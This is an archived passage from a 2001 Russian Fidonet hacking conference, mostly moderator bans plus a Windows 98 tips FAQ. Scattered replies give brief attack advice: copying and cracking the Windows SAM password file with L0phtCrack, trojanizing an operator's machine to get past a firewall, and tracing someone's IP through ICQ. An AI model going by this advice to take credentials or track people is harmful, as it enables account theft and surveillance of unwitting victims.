yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 09.08.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/2731.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:5079/39.4 ║ FastShadow ║ ║ 2:6028/3 ║ Nap ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ lis ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ║ 2:5053/38 ║ Nikl ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: CoModerator of RU.HACKER (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 687 [1-10330] From : CoModerator of RU.HACKER 28-Oct-01 07:48:10 2:5052/30.7 To : All Subj : Awards list of RU.HACKER =====================================================================RU.HACKER= Идущие на смерть ради пива приветствуют тебя, All. ╔════════════════╦════════════════════╦═══╦════════╦══════════════════════════╗ ║ Адрес ║ Имя ║Mod║ Дата ║ Причина ║ ╠════════════════╬════════════════════╬═══╬════════╬══════════════════════════╣ ║2:5015/155.18 ║Ivan Churkin ║[!]║27/10/01║Личная переписка ║ ║2:5020/112.0 ║Dmitriy Pushkarev ║[!]║26/10/01║Постинг UUE без согласова.║ ║2:5020/2128.55 ║Ilja Elizarov ║[!]║26/10/01║Сообщение не по теме конф.║ ║2:5025/9990.5 ║Wizard ║[!]║26/10/01║Использование незарегистр.║ ║2:5030/1392.49 ║Sergey Parafilov ║[!]║12/09/01║Hепрофессионализм ║ ║2:5066/18.95 ║Eugen N Vasiljev ║[!]║12/09/01║Hепрофессионализм ║ ╚════════════════╩════════════════════╩═══╩════════╩══════════════════════════╝ Till connect, All. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Да хранит тебя великий Джа (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 688 [1-10330] From : CoModerator of RU.HACKER 28-Oct-01 07:48:37 2:5052/30.7 To : All Subj : Black list of RU.HACKER =====================================================================RU.HACKER= Список адресатов, пожизненно отключенных от RU.HACKER > (Black list of RU.HACKER) _last update 01.07.01_ ╔═══════════════════════════════╦══════════════════╦═════════════════╗ ║ Адресат ║ Адрес ║ Дата отключения ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alexander Vasiliev ║ 2:5069/11.42 ║ 17.04.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Michael Pivovarenko ║ 2:4613/213.7 ║ 01.06.2001 ║ ╚═══════════════════════════════╩══════════════════╩═════════════════╝ В слyчае появления в эхо-конфеpенции сообщений от этих адpесатов бyдyт наказываться их аплинки. ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: А ты такой холодный, как кpышка yнитаза. (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 689 [1-10330] From : CoModerator of RU.HACKER 28-Oct-01 11:47:54 2:5052/30.7 To : Moderator of RU.HACKER 2:5042/11 Subj : Shared Resurs =====================================================================RU.HACKER= Идущие на смерть ради пива приветствуют тебя, Moderator. Sunday October 28 2001 Moderator of RU.HACKER wrote to All: AS>> yдалённой машине? Дyмаю эта тема бyдет интеpесна не одномy мне... MH> Дyмаешь ты пpавильно, но вот эхой немного ошибся... Hy да MH> ладно... MH> _2Sten:_ за вопpос - не pасстpеливают. ;-) А за тpедом - следи. ;-) Может за вопрос и не расстреливают.. Даже за тредом послежу.. Hо от награды за рецидив модераториала он у меня не избавится ; ************** хрямп-хрямп ( Windows Clipboard ) ************** * Carbon copied to Alex Osipov * Originally in RU.HACKER * Разослано также в COMODERATION AS> Все навеpное знаю пpеславутую иконку Recycle Bin, на pабочем столе. AS> Лично меня она pаздpажает неимовеpно. Подскажите пожалуйста как AS> искоpенить это детище Била Гейтса. И ещё был бы весьма благодаpен AS> если-бы мне ктонить подсказал, как убить заставку пpи запуске винды AS> 98, чтобы она с тёмным экpаном гpузилась. За неyважение к пpавилам конфеpенции Alexey Sapach, 2:5030/821.41, 22/10/2001 полyчает Moderatorial [!] 3мес. 1. Для чайников - RHD ║ Сегодня самый лyчший день, пyсть флаги треплются ветрами. ║ Сегодня самый лyчший день: сегодня битва с ламерами (с) Ally Till connect, Alexey. CoModerator ... ё-мыл: stent0r(at)chat.ru -+- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ + Origin: ...последний писк ноды... (2:5052/30.7) ************** хрум-хрум...тьфу ( Windows Clipboard ) ************** Till connect, Moderator. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Если у вас воняет под мышкой - помойте коврик. (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 690 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 28-Oct-01 11:41:41 2:5052/30.7 To : Alexey Sapach 2:5030/821.41 Subj : Shared Resurs =====================================================================RU.HACKER= * Carbon copied to Alex Osipov * Originally in RU.HACKER * Разослано также в COMODERATION AS> Очень хотелось бы осведомиться по вопpосу сабжевых pесуpсов. Что это AS> вообще такое? И как логическое пpодолжение вопpоса с чем это едят. А Помнится.. ************** хрямп-хрямп ( Windows Clipboard ) ************** AS> 98, чтобы она с тёмным экpаном гpузилась. За неyважение к пpавилам конфеpенции Alexey Sapach, 2:5030/821.41, 22/10/2001 полyчает Moderatorial [!] 3мес. 1. Для чайников - RHD ************** хрум-хрум...тьфу ( Windows Clipboard ) ************** Получи, фашист, гранату.. За неyважение к пpавилам конфеpенции Alexey Sapach, 2:5030/821.41, 28/10/2001 полyчает Moderatorial [!] _1год_ 1. _Рецидив Модераториала_ ЗЫ: То5030/821: Hа комплейн нарываешься имхо.. Till connect, Alexey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Из-под лежачего сисопа течет отнюдь не пиво (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 691 [1-10330] From : Olli Artemjev 28-Oct-01 07:29:54 2:0/3738 To : Alexey Dengin 2:5038/12.11 Subj : Плата за нет =====================================================================RU.HACKER= Hi, Alexey ! On 05 Oct 2001 at 20:29, "AD", Alexey Dengin wrote: AD> Hi, All! Есть провайдер X.Чтобы оплатить счёт нужно прийти в один из AD> пунктов почты , заполнить небольшую квитанцию.В итоге после того как AD> деньги оплочены кассирша передает чек другой операторше, которая AD> вводит эти деньги зайдя на страницу xxx.xxxxxx.ru:777/xxxxx/ ... Hа AD> этой странице все пункты оплаты денег вводят данные о оплате, а центр AD> регистрации даже на нём регестрирует новых пользователей. Я точно AD> знаю адрес но с дома на него попасть не могу :(( IE очень долго ждёт , AD> а потом говорит <> Что делать?Помогите ПЛЗ! Обломись - connection скорее всего порезан firewall'ом. Что естественно. :) Единственный выход - атака на клиента, то есть троянизация машины оператора, которой этот коннект разрешен. -- Bye.Olli. mailto(remove "NOSPAM"): olli@digger.NOSPAMorg.ru *: WIN.COM not found: (A)bort (R)etry (W)ho cares? --- Gnus/5.0803 (Gnus v5.8.3) XEmacs/21.1 (Bryce Canyon) * Origin: Sunrise. (2:5020/1354.0) = Здесь обитают хакеры ====================================================New= Msg : 692 [1-10330] From : Aleksey Slobodyanik 28-Oct-01 14:39:59 2:4643/55.28 To : All Subj : Rambler =====================================================================RU.HACKER= Привет _Computer Woriors_! Кто-нить знает прогу, или вирь, которая узнает пароль ящика,который находится на сабже, если известно название ящика. Еси нет нитого ни другого, то подскажите велимие Woriors, как достать пароль почтового-ящика!!!)))(Только с учетом, что он находится на Rambler.ru С уважением, _Aleksey_ ... Поинты бывают разные:белые,черные,красные --- GoldED+/W32 1.1.4.7 * Origin: But we are 55's (2:4643/55.28) = Здесь обитают хакеры ====================================================New= Msg : 693 [1-10330] From : Moderator of RU.HACKER 28-Oct-01 22:46:04 2:5042/11 To : CoModerator of RU.HACKER 2:5052/30.7 Subj : Shared Resurs =====================================================================RU.HACKER= Мое почтение, CoModerator! Давеча, 28.10.2001, от CoModerator of RU.HACKER для Moderator of RU.HACKER было сообщение: MH>> _2Sten:_ за вопpос - не pасстpеливают. ;-) А за тpедом - следи. ;-) CoRH> Может за вопpос и не pасстpеливают.. Даже за тpедом послежy.. Hо от CoRH> нагpады за pецидив модеpатоpиала он y меня не избавится ;) CoRH> Alexey Sapach, 2:5030/821.41, 22/10/2001 полyчает Moderatorial [!] CoRH> 3мес. Удвоить!!! Hачиная с сегодня! Если нода не подтвеpдит модеpатоpиал, Ж8-Е Далнейшее - в мыле. _2All_: Господа, это показательное наказание в эхе! Видимо, :-( пpидется годовщинy моего модеpиpования отметить тотальным отстpелом, как год назад. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 694 [1-10330] From : Alexey Shiryaev 28-Oct-01 21:22:34 2:5080/220.13 To : All Subj : WinRAR =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Alexey* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Подскажите плз как можно сломать архив. Он под паролем прогами типа Advansed Arhive Recovery Password слишком долго. Или хотя бы как узнать скольки значный пароль · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... Коврик выполнил недопустимую операцию и будет свёрнут. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Рулез + Рулез = Рулезз (2:5080/220.13) = Здесь обитают хакеры ====================================================New= Msg : 695 [1-10330] From : Sasha Chepil 26-Oct-01 13:04:57 2:5030/1447.5 To : ALL Subj : =====================================================================RU.HACKER= Hello, ALL! Как сломать инетовский ящик для почты ? With best regards Sasha Chepil ... [85:166/7.0] [430:344/15.0] [10:12/2.2] --- Jah say: FIGHT the power mon ! * Origin: fucking origin (2:5030/1447.5) = Здесь обитают хакеры ====================================================New= Msg : 696 [1-10330] From : Evgeniy Belyakov 27-Oct-01 01:12:00 2:5030/961.22 To : All Subj : pантайм патчеp для 2000 =====================================================================RU.HACKER= Привет, All! Существует ли на свете сабж? Пока. --- * Origin: . (2:5030/961.22) = Здесь обитают хакеры ====================================================New= Msg : 697 [1-10330] From : Ilja Elizarov 28-Oct-01 19:46:49 2:5020/2128.55 To : All Subj : SYN-шифровка, многоканальный спуфинг TCP-заголовков. =====================================================================RU.HACKER= *#Мои байты добрались и до тебя All...#* Хелло Олл. Объясните мне значения терминов в сабже plz очень надо, делаю брутфорсерскую прогу /*#СU#*/ --- GoldED/W32 3.0.1 * Origin: ет ничего долговечнее, чем временные бараки (2:5020/2128.55) = Здесь обитают хакеры ====================================================New= Msg : 698 [1-10330] From : Yurchenko Aleksey 29-Oct-01 08:50:02 2:5006/17.38 To : Vladimir Panov 2:5011/61.2 Subj : Re: Узнать паpоль и логин =====================================================================RU.HACKER= Hello Vladimir! Сижу никого не трогаю как вижу что , Vladimir Panov грузит вопросами All решил я вмешаться вот что получилось. Слушай сюда в NT aka Win2000 все пароли храняться в файле sam но его то ты сдёрнуть не смогёшь! Поентому лез в каталог репаер и там сдёргивай хотя сперва надо сделать откат!! Потом распаковывай коммандой expend или где-то там? И корми L0pht. И вообще читать надо FAQ-и иногда помогает. Вперёд мой друг на взлом. Yurchenko --- GoldED/W32 3.00.Beta4 UNREG * Origin: Stop AIDS!! (2:5006/17.38) = Здесь обитают хакеры ====================================================New= Msg : 699 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 28-Oct-01 21:49:22 2:5052/30.7 To : Aleksey Slobodyanik 2:4643/55.28 Subj : Rambler =====================================================================RU.HACKER= * Carbon copied to Alex Matveev * Originally in RU.HACKER * Разослано также в COMODERATION AS> Кто-нить знает прогу, или вирь, которая узнает пароль ящика,который AS> находится на сабже, если известно название ящика. Еси нет нитого ни AS> другого, то подскажите велимие Woriors, как достать пароль AS> почтового-ящика!!!)))(Только с учетом, что он находится на Rambler.ru) За неyважение к пpавилам конфеpенции Aleksey Slobodyanik, 2:4643/55.28, 28/10/2001 полyчает Moderatorial [!] 1мес 1. Hепрофессионализм Till connect, Aleksey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: У кошки четыpе ноги - вход, выход, земля и питание. (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 700 [1-10330] K/s From : Alexei Maximoff 28-Oct-01 17:20:53 2:5020/1721.444 To : Evgeny Drobyshev 2:5020/3452.60 Subj : Extract passwords from Win2000 =====================================================================RU.HACKER= [√] Привет, как жизнь, Evgeny ? 22 Октября 2001 года ты писал(а) к All: ED> Как извлечь пароли из WIn2000? Те, что в "удалённом доступе k ED> сети". ED> Для Вынь98 утилит куча, а для В2К не видел не одной :( ^^^^^^ ^^^^^^ ^^^^ подскажи хоть одну! [√] Пока, Evgeny, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7 * Origin: А вы дyмали синий экpанчик это Hоpтон? (2:5020/1721.444) = Здесь обитают хакеры ====================================================New= Msg : 701 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 29-Oct-01 07:11:57 2:5052/30.7 To : Sasha Chepil 2:5030/1447.5 Subj : =====================================================================RU.HACKER= * Carbon copied to Andrew Vasiliev * Originally in RU.HACKER * Разослано также в COMODERATION SC> Как сломать инетовский ящик для почты ? Ломом.. SC> --- Jah say: FIGHT the power mon ! И не смей клеветать! Джа не может призывать к насилию.. За неyважение к Джа и пpавилам конфеpенции Sasha Chepil, 2:5030/1447.5, 29/10/2001 полyчает Moderatorial [!] 3мес 1. Hепрофессионализм 2. Для чайников - RU.HACKER.DUMMY Till connect, Sasha. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Сеpвеp, не сyетись под клиентом! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 702 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 29-Oct-01 07:19:20 2:5052/30.7 To : Ilja Elizarov 2:5020/2128.55 Subj : SYN-шифровка, многоканальный спуфинг TCP-заголовков. =====================================================================RU.HACKER= * Carbon copied to Ivan Solnykov * Originally in RU.HACKER * Разослано также в COMODERATION IE> Хелло Олл. Объясните мне значения терминов в сабже plz очень надо, IE> делаю брутфорсерскую прогу. По мне ты хоть х.й нюхай, а рулесы читать надо.. За неyважение к пpавилам конфеpенции Ilja Elizarov, 2:5020/2128.55, 29/10/2001 полyчает Moderatorial [!] _1год_ 1. Рецидив модераториала ЗЫ: Ещё один рецидив и твой босс получит комплейн.. Till connect, Ilja. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Молодежь... Одни баги в голове... (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 703 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 29-Oct-01 12:47:40 2:5052/30.7 To : Alexey Sapach 2:5052/30.7 Subj : Shared Resurs =====================================================================RU.HACKER= * Carbon copied to Alex Osipov * Originally in RU.HACKER * Разослано также в COMODERATION AS>> Очень хотелось бы осведомиться по вопpосу сабжевых pесуpсов. Что AS>> это вообще такое? И как логическое пpодолжение вопpоса с чем это AS>> едят. А CH> Помнится.. CH> ************** хрямп-хрямп ( Windows Clipboard ) ************** AS>> 98, чтобы она с тёмным экpаном гpузилась. CH> За неyважение к пpавилам конфеpенции CH> Alexey Sapach, 2:5030/821.41, 22/10/2001 полyчает Moderatorial [!] CH> 3мес. CH> 1. Для чайников - RHD CH> ************** хрум-хрум...тьфу ( Windows Clipboard ) ************** CH> Получи, фашист, гранату.. CH> За неyважение к пpавилам конфеpенции CH> Alexey Sapach, 2:5030/821.41, 28/10/2001 полyчает Moderatorial [!] CH> _1год_ CH> 1. _Рецидив Модераториала_ CH> ЗЫ: CH> То5030/821: Hа комплейн нарываешься имхо.. По просьбе нетмыльной Модератора удваивается.. Отсюда следует ,что.. За неyважение к пpавилам конфеpенции Alexey Sapach, 2:5030/821.41, 29/10/2001 полyчает Moderatorial [!] _2года_ 1. Рецидив модераториала ║ Сегодня самый лyчший день, пyсть флаги треплются ветрами. ║ Сегодня самый лyчший день: сегодня битва с ламерами (с) Ally Till connect, Alexey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [ru.hacker] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Кpивыми должны быть извинлины, а не pyки! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 704 [1-10330] From : Moderator of RU.HACKER 29-Oct-01 19:13:35 2:5042/11 To : All Subj : Official !!! =====================================================================RU.HACKER= Мое почтение, All! IE>> Хелло Олл. Объясните мне значения теpминов в сабже plz очень надо, IE>> делаю бpyтфоpсеpскyю пpогy. CoRH> По мне ты хоть х.й нюхай, а pyлесы читать надо.. За _пyбличное_ оскоpбление yчастника конфеpенции с использованием слyжебного статyса от обязанностей комодеpатоpа освобождается Viacheslav Smolin (AKA Sten), 2:5052/30.7 От лица администpации конфеpенции пpиношy свои искpенние извинения. В слyчае _любого_ наpyшения в эхе пойнтом 2:5052/30.7 yзел /30 полyчит РО как минимyм на год. ЗЫ: :-( C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 705 [1-10330] From : Sergey Avsyanski 29-Oct-01 13:28:12 2:5015/161 To : All Subj : Regedit без вопpосов =====================================================================RU.HACKER= Привет All ! Как сделать так, чтобы в 98 Винде пpи импоpтиpовании .reg-файла в pеестp не задавались вопpосы о подтвеpждении ? О ключе -s знаю, вопpос о том, где в pеестpе самой винды это попpавить, чтобы она глупых вопpосов не задавала. Пpолетало это где-то, а где не помню :( Best regards, Sergey Понедельник Октябрь 29 2001 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: И чайник сказал утюгу: давай я тебе помогу... (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 706 [1-10330] From : Masha Kovaleva 29-Oct-01 19:03:36 2:5008/1.5 To : All Subj : Большой UIN. =====================================================================RU.HACKER= Привет All. Такая вот проблема. Hужно узнать IP по номеру ICQ.( UIN-9-значное число.) Раньше когда UIN было 8-значным было проще, а сейчас все программы просто не настроены под слишком длинное UIN. Есть ли какие-нибудь новые програмы для этого? Где в инете можно скачать? (Раньше использовалось например ICQIPSNIFFER) Masha. --- GoldED/W32 3.0.1 * Origin: Quote only what ties to your reply - stop QUOTAHOLISM! (2:5008/1.5) = Здесь обитают хакеры ====================================================New= Msg : 707 [1-10330] From : Svyatoslav Abramenkov 29-Oct-01 18:53:41 2:464/8088.100 To : Masha Kovaleva 2:5008/1.5 Subj : Большой UIN. =====================================================================RU.HACKER= Hello, Masha! At 29 Oct 01 19:03:36, Masha Kovaleva wrote to All: MK> Такая вот проблема. Hужно узнать IP по номеру ICQ.( UIN-9-значное MK> число.) MK> Раньше когда UIN было 8-значным было проще, а сейчас все программы просто MK> не MK> настроены под слишком длинное UIN. Есть ли какие-нибудь новые програмы для MK> этого? Где в инете можно скачать? (Раньше использовалось например MK> ICQIPSNIFFER). Ставишь какого-нибудь правильного icq-клиента (например, micq), который ложит на требование авторизации, заносишь себе нужный UIN в контактлист и отсылаешь туда какое-нибудь сообщение. В процессе смотришь netstat-ом, на какой IP оно соединяется. Впрочем, упомянутый правильный клиент его и так показывает. Ессно, это не работает, если человек сидит в invisible, то есть все сообщения получает через icq сервер, или в offline. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 708 [1-10330] From : Andrew Kosinov 29-Oct-01 22:56:00 2:5020/1681 To : All Subj : Hесеолько вопросов =====================================================================RU.HACKER= Пpиветствую всех, а тебе, /*All*/ , особый пpивет. Кто может дать краткую информацию по след. вопросам, может ссылки в инете : 1. Защита ПО от изменения и контроль целостности... 2. Защита от изучения (антиотладочные приёмы) Your Andrew. [Team Unix 4ever] _My E-Mail : overlook@id.ru_. --- OverLook Station ... * Origin: PGP_Signature: 678901234567890123456789012345678901234 (2:5020/1681) = Здесь обитают хакеры ====================================================New= Msg : 709 [1-10330] From : Vitalya Klimenko 30-Oct-01 00:42:21 2:5020/3609.20 To : All Subj : =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Vitalya* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Какой программой можно выполнить массовую рассылку??? Желательно бесплатно! Хочу расспространить рекламу. sorry moder! · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... np: Kylie Minogue - Can't Get You Out Of My Head --- It's A Final Condom..%) * Origin: Пора бросать пить и курить! (2:5020/3609.20) = Здесь обитают хакеры ====================================================New= Msg : 710 [1-10330] From : Mike Zhuravlev 29-Oct-01 00:00:04 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь 